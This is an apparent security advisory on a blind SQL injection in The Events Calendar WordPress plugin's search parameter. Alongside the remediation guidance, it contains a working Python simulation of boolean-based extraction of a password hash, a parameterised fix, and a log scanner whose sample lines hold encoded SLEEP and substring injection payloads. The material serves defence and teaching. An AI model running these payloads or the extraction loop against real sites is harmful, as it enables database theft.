CVE-2025-12197

WordPress · WordPress The Events Calendar Plugin

A high-severity vulnerability has been identified in The Events Calendar plugin for WordPress, which could allow an unauthenticated attacker to steal sensitive information from the website's database.

Executive summary

The Events Calendar plugin for WordPress contains a blind SQL injection flaw that an unauthenticated, remote attacker can exploit without any user interaction to read sensitive data from the site's database. Because the injection is blind, data is recovered indirectly and slowly, but the end result is the same: exposure of user credentials, personal information, and other confidential site data. Organizations running an affected version of the plugin are at significant risk of data compromise and should apply the vendor's update immediately.

Vulnerability

This vulnerability is a blind SQL injection caused by insufficient sanitization of user-supplied input passed in the 's' parameter, the query variable WordPress uses for site search. An unauthenticated remote attacker can append SQL fragments to this parameter so that they are evaluated as part of a database query. Because the injection is "blind," the attacker receives no direct database output in the HTTP response; instead they use boolean-based techniques (does the page content change when an injected condition is true?) or time-based techniques (does the response stall for an injected delay?) to infer the database structure and extract data one character, or one bit, at a time. Each inferred character costs several requests, so a successful extraction is slow and noisy, which is also what makes it visible in server logs.
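The following is an added example, not code from The Events Calendar or its vendor. It is a self-contained simulation of the bug class described above: a hypothetical search handler that splices the 's' value into its SQL, an attacker who can only observe whether the results list is empty, and the same handler with a bound parameter. The table names, the sample rows and the password hash string are constructed for illustration; sqlite3 stands in for the real database.

```python
"""Boolean-based blind SQL injection, simulated end to end (added example).

This is NOT The Events Calendar's code. It models the class of bug the
advisory describes with a hypothetical search handler, a boolean oracle
(does the page show any results?) and the parameterised fix.
"""
import sqlite3

# Constructed sample data standing in for WordPress tables.
SCHEMA = """
CREATE TABLE wp_users (ID INTEGER PRIMARY KEY, user_login TEXT, user_pass TEXT);
CREATE TABLE wp_posts (ID INTEGER PRIMARY KEY, post_title TEXT, post_status TEXT);
INSERT INTO wp_users VALUES (1, 'admin', '$P$Bexample-hash');
INSERT INTO wp_posts VALUES (1, 'Spring Gala', 'publish'),
                            (2, 'Autumn Fair', 'publish');
"""


def new_db():
    con = sqlite3.connect(":memory:")
    con.executescript(SCHEMA)
    return con


def search_vulnerable(con, s):
    """Hypothetical search handler: the 's' value is concatenated into SQL."""
    sql = ("SELECT post_title FROM wp_posts WHERE post_status='publish' "
           "AND post_title LIKE '%" + s + "%'")
    return [row[0] for row in con.execute(sql)]


def search_fixed(con, s):
    """Same query with a bound parameter: 's' can no longer alter the SQL."""
    sql = ("SELECT post_title FROM wp_posts WHERE post_status='publish' "
           "AND post_title LIKE ?")
    return [row[0] for row in con.execute(sql, ("%" + s + "%",))]


def oracle(search, con, condition):
    """Boolean oracle: inject a condition, observe only whether results appear.

    The payload closes the LIKE literal, ANDs in the attacker's condition and
    re-balances the quotes with a tautology so the query stays syntactically valid.
    """
    payload = "Gala%' AND (" + condition + ") AND '1%'='1"
    return len(search(con, payload)) > 0


def extract(search, con, column, table, max_len=40):
    """Recover one text value character by character.

    Each character is found by binary search over its code point, so every
    position costs 7 oracle requests.  Returns (value, request_count) so the
    noise level of a blind attack is visible.
    """
    out, requests = "", 0
    for pos in range(1, max_len + 1):
        lo, hi = 0, 127  # search the ASCII range
        while lo < hi:
            mid = (lo + hi) // 2
            cond = (f"unicode(substr((SELECT {column} FROM {table} LIMIT 1),"
                    f"{pos},1)) > {mid}")
            requests += 1
            if oracle(search, con, cond):
                lo = mid + 1
            else:
                hi = mid
        if lo == 0:
            # substr() past the end returns '' and unicode('') is NULL,
            # so the oracle is always false: end of the value.
            break
        out += chr(lo)
    return out, requests


if __name__ == "__main__":
    db = new_db()
    value, n = extract(search_vulnerable, db, "user_pass", "wp_users")
    print(f"vulnerable handler leaked {value!r} in {n} requests")
    print("fixed handler leaked", extract(search_fixed, db, "user_pass", "wp_users"))
```

Against the vulnerable handler the loop recovers the sample hash in 7 requests per character; against the parameterised handler the same payloads are just an unmatched LIKE pattern, the oracle never fires, and nothing is recovered. A time-based variant replaces the boolean condition with a conditional delay and measures response latency instead of checking for results.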

Business impact

This vulnerability is rated as High severity with a CVSS score of 7.5. Successful exploitation could lead to a significant data breach: the attacker can read any data the WordPress database user can reach, which in a standard installation is the entire WordPress database. The potential consequences include the theft of user account password hashes and session-related data, personally identifiable information (PII) of customers or event attendees, and other sensitive business data. Such an incident could result in severe reputational damage, loss of customer trust, and regulatory fines under data protection regulations such as GDPR or CCPA.

Remediation

Immediate Action: Immediately update The Events Calendar plugin to the latest version released by the vendor, which contains a patch for this vulnerability. After updating, confirm that the installed version is the patched release (the plugin's Version header in wp-admin, or the output of WP-CLI's `wp plugin list`) rather than assuming the update completed. Patching stops further extraction but does not undo any that already happened: if logs show injection attempts against the 's' parameter before the update, treat the database contents as potentially exposed and force a password reset and credential rotation. If the plugin is no longer essential for business operations on any website, it should be deactivated and removed to reduce the overall attack surface.

Proactive Monitoring: Monitor web server and Web Application Firewall (WAF) logs for suspicious requests targeting the 's' parameter. Look for SQL keywords (e.g., SELECT, UNION, SLEEP, BENCHMARK) combined with quote characters, comment terminators, or function-call syntax; a bare keyword such as SELECT also appears in legitimate search phrases, so keyword matching alone produces false positives. Because blind extraction needs one request per inferred bit or character, the strongest signal is volume: many requests from one source with small variations in 's' over a short period. Where request durations are logged, responses to 's' requests that cluster at a fixed delay indicate time-based probing. Monitor database logs for abnormally long-running queries or unexpected errors, which can be indicators of an ongoing blind SQL injection attack.
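As an added example, not a vendor or page-supplied tool, the scanner below applies the monitoring guidance above to combined-format access logs: it URL-decodes the 's' parameter (twice, to catch double-encoded payloads), scores it against injection indicators that rarely occur in genuine search phrases, and separately flags sources that send many distinct 's' values, which is what boolean or time-based extraction looks like from the server side. The log lines, IP addresses and threshold are constructed for illustration.

```python
"""Scan access logs for blind SQL injection probing of the 's' parameter (added example).

Not vendor code.  Two signals are combined: content indicators in the decoded
's' value, and per-source request volume against 's'.  Sample lines are constructed.
"""
import re
from collections import defaultdict
from urllib.parse import urlsplit, parse_qs, unquote_plus

LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] "(?P<method>\S+) (?P<path>\S+) \S+" '
    r'(?P<status>\d{3}) (?P<size>\S+)'
)

# Indicators checked against the decoded, lower-cased 's' value.  A bare SQL
# keyword is deliberately not an indicator: "select committee" is a real search.
# MySQL also accepts '#' as a comment start, but that collides with hashtags
# in ordinary searches, so it is left out here and should be tuned per site.
INDICATORS = [
    ("time-based function", re.compile(r"\b(sleep|benchmark|pg_sleep|waitfor)\s*\(")),
    ("quote then boolean", re.compile(r"['\"]\s*(and|or)\s+[\w(]")),
    ("tautology", re.compile(r"\b(or|and)\s+\d+\s*=\s*\d+")),
    ("comment terminator", re.compile(r"(--\s|/\*)")),
    ("stacked/union", re.compile(r"(;\s*(select|drop|update|insert)\b|\bunion\s+(all\s+)?select\b)")),
    ("substring probe", re.compile(r"\b(substr|substring|mid|ascii|ord|unicode)\s*\(")),
]


def search_value(path):
    """Return the decoded 's' query parameter from a request path, or None.

    parse_qs decodes once; the second unquote_plus unwraps double-encoded
    payloads, a common WAF-evasion trick.
    """
    vals = parse_qs(urlsplit(path).query, keep_blank_values=True).get("s")
    return unquote_plus(vals[0]) if vals else None


def score(value):
    """Return the names of every indicator matching a decoded 's' value."""
    v = value.lower()
    return [name for name, rx in INDICATORS if rx.search(v)]


def analyse(lines, volume_threshold=20):
    """Scan log lines; return (per-request hits, IPs exceeding the volume threshold)."""
    hits = []
    per_ip = defaultdict(set)
    for line in lines:
        m = LOG_RE.match(line)
        if not m:
            continue
        s = search_value(m["path"])
        if s is None:
            continue
        per_ip[m["ip"]].add(s)
        names = score(s)
        if names:
            hits.append((m["ip"], s, names))
    noisy = sorted(ip for ip, vals in per_ip.items() if len(vals) >= volume_threshold)
    return hits, noisy


# Constructed sample log: two legitimate searches, a time-based probe, a
# double-encoded boolean probe, then a 25-request character-extraction run.
SAMPLE_LOG = [
    '203.0.113.10 - - [12/Nov/2025:10:00:01 +0000] "GET /?s=select+committee+meeting HTTP/1.1" 200 5123',
    '203.0.113.10 - - [12/Nov/2025:10:00:09 +0000] "GET /?s=gala HTTP/1.1" 200 4801',
    '198.51.100.7 - - [12/Nov/2025:10:01:00 +0000] "GET /?s=gala%27+AND+SLEEP%285%29--+ HTTP/1.1" 200 4801',
    '198.51.100.7 - - [12/Nov/2025:10:01:06 +0000] "GET /?s=gala%2527+AND+1%253D1--+ HTTP/1.1" 200 4801',
]
SAMPLE_LOG += [
    f'198.51.100.7 - - [12/Nov/2025:10:02:{i:02d} +0000] "GET /?s=gala%27+AND+unicode%28substr%28'
    f'%28SELECT+user_pass+FROM+wp_users+LIMIT+1%29%2C{i}%2C1%29%29%3E64--+ HTTP/1.1" 200 4801'
    for i in range(1, 26)
]

if __name__ == "__main__":
    found, sources = analyse(SAMPLE_LOG)
    for ip, s, names in found:
        print(f"{ip}  s={s!r}  {', '.join(names)}")
    print("high-volume sources:", sources)
```

The legitimate "select committee meeting" search is not flagged, while every probe from 198.51.100.7 is, and that source is also reported on volume alone. In practice the volume signal is the one to trust when indicators are ambiguous: a genuine user does not issue dozens of near-identical searches per minute.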

Compensating Controls: If immediate patching is not feasible, implement a Web Application Firewall (WAF) with strict rules designed to detect and block SQL injection patterns, and configure it to inspect the 's' parameter on all requests, including URL-encoded and double-encoded forms. Ensure the database user account for the WordPress application operates under the principle of least privilege: it should have no access to other databases on the server and no administrative grants such as FILE or SUPER. Note that WordPress needs full read and write access to its own database, so this limits the blast radius of an injection to the WordPress tables rather than preventing the data read itself.

Exploitation status

Public Exploit Available: False

Analyst recommendation

Given the high severity (CVSS 7.5) and the potential for a complete read of the WordPress database by an unauthenticated attacker, this vulnerability poses a serious risk to the organization. We strongly recommend that all instances of The Events Calendar plugin be updated to the latest patched version immediately. Although this vulnerability is not currently on the CISA KEV list and no public exploit is known, blind SQL injection in a search parameter is straightforward to exploit once the injection point is known, and proactive remediation is essential to prevent a potential data breach.